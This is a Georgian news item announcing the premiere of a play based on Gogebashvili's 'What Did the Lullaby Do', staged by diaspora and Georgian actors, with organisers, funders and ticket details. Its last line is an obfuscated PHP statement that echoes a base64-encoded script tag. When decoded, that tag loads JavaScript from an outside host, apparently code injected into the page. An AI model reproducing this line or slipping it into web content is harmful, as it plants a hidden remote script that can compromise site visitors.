celsiusi
ავერსი საქკაბელი
7 ივლისს, 19:00-ზე, ვახტანგ სალარიძის სახელობის საკონცერტო დარბაზში იაკობ გოგებაშვილის „იავნანამ რა ჰქმნა“-ს მოტივებზე შექმნილი სპექტაკლის პრემიერა შედგება.
 
სცენაზე მაყურებელი იხილავს დიასპორაში მცხოვრები ქართველი მოყვარული მსახიობებისა და საქართველოში მოღვაწე პროფესიონალი მსახიობებისგან შემდგარი დასის მონაწილეობით, საგანგებოდ შერჩეული ნაწარმოების, იაკობ გოგებაშვილის „იავნანამ რა ჰქმნა“-ს მოტივებზე შექმნილი სპექტაკლის პრემიერას.
 
პროექტის ავტორია, „მეღვინეობა თიესვი“–ის დამფუძნებელი. თიკა სვანიძე ვენკო. 
 
როგორც პროექტის ავტორმა, საინფორმაციო სააგენტო BUSINESS TIME-ს განუცხადა, პროექტის მიზანია, ერთ სივრცეში გააერთიანოს ემიგრაციაში და საქართველოში მყოფი პროფესიონალი და მოყვარული მსახიობები.
 
 
„აღნიშნული სპექტაკლის მეშვეობით მოხდება მშობლიური ენის ფენომენის, როგორც ღირებულების აღქმა და ხაზგასმა იმ ემოციური კავშირების მეშვეობით, რასაც სპექტაკლი მაყურებლამდე მიიტანს.
 
პროექტი ხელს შეუწყობს ქართული ენის შენარჩუნების კუთხით, ქართული თეატრის უნიკალური რესურსის გააქტიურებას და ემიგრაციაში ქართული კულტურული კერების შექმნას” – განმარტა თიკა სვანაძე-ვენკომ.
 
პროექტის ორგანიზატორები არიან პირველი ქართული საერთაშორისო დიასპორული თეატრი, „დაბრუნება“ და ART ეარი. რეჟისორი - გეგა ქურციკიძე 
ფინანსური მხარდამჭერები არიან : ქალაქ თბილისის მერია, საქართველოს კულტურის, სპორტისა და ახალგაზრდობის სამინისტრო, ფონდი, „დიასპორების ალიანსი საქართველოსთვის“ , მეღვინოება თიესვი .
 
ბილეთების შეძენა შესაძლებელია Biletebi.ge-ზე. 
 
 
 
648
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");